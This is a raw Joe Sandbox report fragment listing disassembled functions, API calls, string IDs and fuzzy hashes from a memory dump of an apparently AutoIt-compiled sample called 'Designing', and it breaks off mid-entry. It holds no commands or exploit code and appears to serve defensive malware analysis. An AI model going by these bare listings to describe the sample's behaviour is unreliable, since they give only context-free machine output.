                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long$MetricsSystem
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 2294984445-2063206799
                                                                                                                                                                              • Opcode ID: d31edda3397ac9c6feaee36f0806cbb6f39f45a5e7778c1009a0210451e8d14d
                                                                                                                                                                              • Instruction ID: f7dec9d6582afaeb00ea5606edbfb14b273b5b4520457ee658c89a74b0b243ba
                                                                                                                                                                              • Opcode Fuzzy Hash: d31edda3397ac9c6feaee36f0806cbb6f39f45a5e7778c1009a0210451e8d14d
                                                                                                                                                                              • Instruction Fuzzy Hash: 30219071614345AFCB159F39DD0CA6A3FA6EB85329F35562AFA26E21E0DE308854CB10
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                              • String ID: 0.0.0.0
                                                                                                                                                                              • API String ID: 642191829-3771769585
                                                                                                                                                                              • Opcode ID: c932c71b6e9743f0a27ba2fe232b523c3d266ae824e0ad1bb852e108888c7783
                                                                                                                                                                              • Instruction ID: 9d63d7854913bee5e83a2a9ea2a194d842b8cff753bc01876bdef1d5b29550a4
                                                                                                                                                                              • Opcode Fuzzy Hash: c932c71b6e9743f0a27ba2fe232b523c3d266ae824e0ad1bb852e108888c7783
                                                                                                                                                                              • Instruction Fuzzy Hash: 1E11E431904219BFDB246B60EC4AFEA7BACDF01714F04017AF515B71A1EE749AC58A70
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcslen$LocalTime
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 952045576-0
                                                                                                                                                                              • Opcode ID: d1860c87e6728aeef9e3c050b71a32fa70b55e216e142d2c1395014912de20ff
                                                                                                                                                                              • Instruction ID: db6b6004d8d9449808eba0f6467a0a646f5237daafd4fc76155e783d1e91224c
                                                                                                                                                                              • Opcode Fuzzy Hash: d1860c87e6728aeef9e3c050b71a32fa70b55e216e142d2c1395014912de20ff
                                                                                                                                                                              • Instruction Fuzzy Hash: 2F418265C11119B5CB11EBF88C8AFDFB7A8EF05310F54846AE518E3161FA34D2A5C3B6
                                                                                                                                                                              APIs
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00E337B7
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00E337BF
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E337CA
                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00E337D6
                                                                                                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E33812
                                                                                                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E33823
                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E36504,?,?,000000FF,00000000,?,000000FF,?), ref: 00E3385E
                                                                                                                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E3387D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3864802216-0
                                                                                                                                                                              • Opcode ID: e986b91fb93add457e97d9d82b4270ea5db8cad8c5b029c299fc1210664fd8f8
                                                                                                                                                                              • Instruction ID: 82225bd61f020fbaf3fb791cbb307abca46442e48555ab9fd76d0c4621ea32de
                                                                                                                                                                              • Opcode Fuzzy Hash: e986b91fb93add457e97d9d82b4270ea5db8cad8c5b029c299fc1210664fd8f8
                                                                                                                                                                              • Instruction Fuzzy Hash: 0E319F72205218BFEB154F61DC8AFEB3FA9EF49715F044065FE08AA191C6B59C51CBA0
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                              • API String ID: 0-572801152
                                                                                                                                                                              • Opcode ID: e6a62c1c3d2c179a5d1c22fbead87702a91db4267ce0bc55ca8acab89562d751
                                                                                                                                                                              • Instruction ID: 1eb448bfcb0415e5f6963e97d229540029ba0bc3b5a35faa774e9c95c48ac6f4
                                                                                                                                                                              • Opcode Fuzzy Hash: e6a62c1c3d2c179a5d1c22fbead87702a91db4267ce0bc55ca8acab89562d751
                                                                                                                                                                              • Instruction Fuzzy Hash: 2CD1B172A0071A9FDB10CF68E985BAEB7B5FF48308F149569E915BB280E770DD41CB50
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00DE1B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00DE194E
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00DE1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00DE19D1
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00DE1B7B,?,00DE1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00DE1A64
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00DE1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00DE1A7B
                                                                                                                                                                                • Part of subcall function 00DD3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00DC6A79,?,0000015D,?,?,?,?,00DC85B0,000000FF,00000000,?,?), ref: 00DD3BC5
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00DE1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00DE1AF7
                                                                                                                                                                              • __freea.LIBCMT ref: 00DE1B22
                                                                                                                                                                              • __freea.LIBCMT ref: 00DE1B2E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2829977744-0
                                                                                                                                                                              • Opcode ID: 6eefa96a41e8578ea01e12343d7558a97469e204b79353091da044d242b0a562
                                                                                                                                                                              • Instruction ID: 644f4b2d7f22611d1457ab409c7174a2a265d03462338c40315545bb509389b5
                                                                                                                                                                              • Opcode Fuzzy Hash: 6eefa96a41e8578ea01e12343d7558a97469e204b79353091da044d242b0a562
                                                                                                                                                                              • Instruction Fuzzy Hash: 7B91D476F00296AFDB21AE66CC91AEE7BB9EF09310F180569E865E7141E734DC44CB70
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Variant$ClearInit
                                                                                                                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                              • API String ID: 2610073882-625585964
                                                                                                                                                                              • Opcode ID: f4ff5fa3327fe3824d97bbeb896359d7b4a77b38c7909cf7b7c5aa3716c39f1d
                                                                                                                                                                              • Instruction ID: 9bd48f487e5baeca3bf8346a2775324f6471ef370a8c115645e69825025b05a0
                                                                                                                                                                              • Opcode Fuzzy Hash: f4ff5fa3327fe3824d97bbeb896359d7b4a77b38c7909cf7b7c5aa3716c39f1d
                                                                                                                                                                              • Instruction Fuzzy Hash: 6791AB32A00629ABDB20CFA5ED48FAEBBB8EF45314F109519F505BB280D7709901CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00E11C1B
                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E11C43
                                                                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00E11C67
                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E11C97
                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E11D1E
                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E11D83
                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E11DEF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2550207440-0
                                                                                                                                                                              • Opcode ID: 1bfda9df842874813d437cf4f6c3d187ee201aa11156d876cc18dc6e7ad62b77
                                                                                                                                                                              • Instruction ID: cca46fc167cfbb853b4b576532d3bd0c0dd5dfe9dbddabf492178a3f7023e635
                                                                                                                                                                              • Opcode Fuzzy Hash: 1bfda9df842874813d437cf4f6c3d187ee201aa11156d876cc18dc6e7ad62b77
                                                                                                                                                                              • Instruction Fuzzy Hash: 8A911171A00219AFDB04DFA4D884BFEB7B4FF04715F1490A9EA50FB291D774A980CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00E243C8
                                                                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00E244D7
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E244E7
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00E2467C
                                                                                                                                                                                • Part of subcall function 00E1169E: VariantInit.OLEAUT32(00000000), ref: 00E116DE
                                                                                                                                                                                • Part of subcall function 00E1169E: VariantCopy.OLEAUT32(?,?), ref: 00E116E7
                                                                                                                                                                                • Part of subcall function 00E1169E: VariantClear.OLEAUT32(?), ref: 00E116F3
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                              • API String ID: 4137639002-1221869570
                                                                                                                                                                              • Opcode ID: a5000047e1333a378fecb8a57781d30217c2a1733c129b6efd5297aaa0945887
                                                                                                                                                                              • Instruction ID: d915bb4c2fad1707192b9c72a5b0f67afe2660ac6d6da11009274e321a687f83
                                                                                                                                                                              • Opcode Fuzzy Hash: a5000047e1333a378fecb8a57781d30217c2a1733c129b6efd5297aaa0945887
                                                                                                                                                                              • Instruction Fuzzy Hash: F1917CB56083119FC700EF24D48096ABBE4FF89714F14991DF89AA7391DB31ED46CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00E008FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E00831,80070057,?,?,?,00E00C4E), ref: 00E0091B
                                                                                                                                                                                • Part of subcall function 00E008FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E00831,80070057,?,?), ref: 00E00936
                                                                                                                                                                                • Part of subcall function 00E008FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E00831,80070057,?,?), ref: 00E00944
                                                                                                                                                                                • Part of subcall function 00E008FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E00831,80070057,?), ref: 00E00954
                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00E256AE
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E257B6
                                                                                                                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00E2582C
                                                                                                                                                                              • CoTaskMemFree.OLE32(?), ref: 00E25837
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                              • String ID: NULL Pointer assignment
                                                                                                                                                                              • API String ID: 614568839-2785691316
                                                                                                                                                                              • Opcode ID: c933705d84f5116ffea4f5d5e853a151b15921c8c0ba3517c3119d7631b103ad
                                                                                                                                                                              • Instruction ID: 69fd006bac3133d9b1f86038c881572dafd3732c495bca4ecab4753a4fb27983
                                                                                                                                                                              • Opcode Fuzzy Hash: c933705d84f5116ffea4f5d5e853a151b15921c8c0ba3517c3119d7631b103ad
                                                                                                                                                                              • Instruction Fuzzy Hash: FC91E472D00229AFDF14DFA4DC81AEEBBB9EF08314F10456AE915B7251DB709A45CF60
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetMenu.USER32(?), ref: 00E32C1F
                                                                                                                                                                              • GetMenuItemCount.USER32(00000000), ref: 00E32C51
                                                                                                                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E32C79
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E32CAF
                                                                                                                                                                              • GetMenuItemID.USER32(?,?), ref: 00E32CE9
                                                                                                                                                                              • GetSubMenu.USER32(?,?), ref: 00E32CF7
                                                                                                                                                                                • Part of subcall function 00E04393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E043AD
                                                                                                                                                                                • Part of subcall function 00E04393: GetCurrentThreadId.KERNEL32 ref: 00E043B4
                                                                                                                                                                                • Part of subcall function 00E04393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E02F00), ref: 00E043BB
                                                                                                                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E32D7F
                                                                                                                                                                                • Part of subcall function 00E0F292: Sleep.KERNEL32 ref: 00E0F30A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4196846111-0
                                                                                                                                                                              • Opcode ID: 788e46930212bda8c35be6e56e562a55ca7fcecbd5ea329d361476aaffde2083
                                                                                                                                                                              • Instruction ID: c4fec7376bb30bc63259b9bffe087aae21a073e84d2133e99352df1441890494
                                                                                                                                                                              • Opcode Fuzzy Hash: 788e46930212bda8c35be6e56e562a55ca7fcecbd5ea329d361476aaffde2083
                                                                                                                                                                              • Instruction Fuzzy Hash: 4C719B75A00205AFCB00EF65C849AAEBBF1EF48314F149859E956FB251DB34AE41CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetParent.USER32(?), ref: 00E0B8C0
                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 00E0B8D5
                                                                                                                                                                              • SetKeyboardState.USER32(?), ref: 00E0B936
                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E0B964
                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E0B983
                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E0B9C4
                                                                                                                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E0B9E7
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 87235514-0
                                                                                                                                                                              • Opcode ID: a3832fa6a371d208f55de72e0f92e189ee7fd5ec8e3384cbfca528f54c4780ef
                                                                                                                                                                              • Instruction ID: 335bf65e14fb7fbf89445e2a8b75edddd780bb8e4dccd0edb6f2fd17cbfbe402
                                                                                                                                                                              • Opcode Fuzzy Hash: a3832fa6a371d208f55de72e0f92e189ee7fd5ec8e3384cbfca528f54c4780ef
                                                                                                                                                                              • Instruction Fuzzy Hash: C951E3A06087D53EFB364234CC55BBA7EA96F46708F089489E1D9A58D2C3E8EDC4D760
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetParent.USER32(00000000), ref: 00E0B6E0
                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 00E0B6F5
                                                                                                                                                                              • SetKeyboardState.USER32(?), ref: 00E0B756
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E0B782
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E0B79F
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E0B7DE
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E0B7FF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 87235514-0
                                                                                                                                                                              • Opcode ID: 3af579dbd1bd8231aaff971918ca038bb6ff03b3dbb5de6f39c9859c70cf4c39
                                                                                                                                                                              • Instruction ID: 0c3b35b87ba56226034e5c581538d403c80ed34debb612c6166cafd60085c9bc
                                                                                                                                                                              • Opcode Fuzzy Hash: 3af579dbd1bd8231aaff971918ca038bb6ff03b3dbb5de6f39c9859c70cf4c39
                                                                                                                                                                              • Instruction Fuzzy Hash: DC5105A09487D53EFB368334CC55B767EA8BB45308F0C958AE0D56A8D2D394ECD8DB60
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00DD5F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00DD57E3
                                                                                                                                                                              • __fassign.LIBCMT ref: 00DD585E
                                                                                                                                                                              • __fassign.LIBCMT ref: 00DD5879
                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00DD589F
                                                                                                                                                                              • WriteFile.KERNEL32(?,FF8BC35D,00000000,00DD5F16,00000000,?,?,?,?,?,?,?,?,?,00DD5F16,?), ref: 00DD58BE
                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,00DD5F16,00000000,?,?,?,?,?,?,?,?,?,00DD5F16,?), ref: 00DD58F7
                                                                                                                                                                              Memory Dump Source
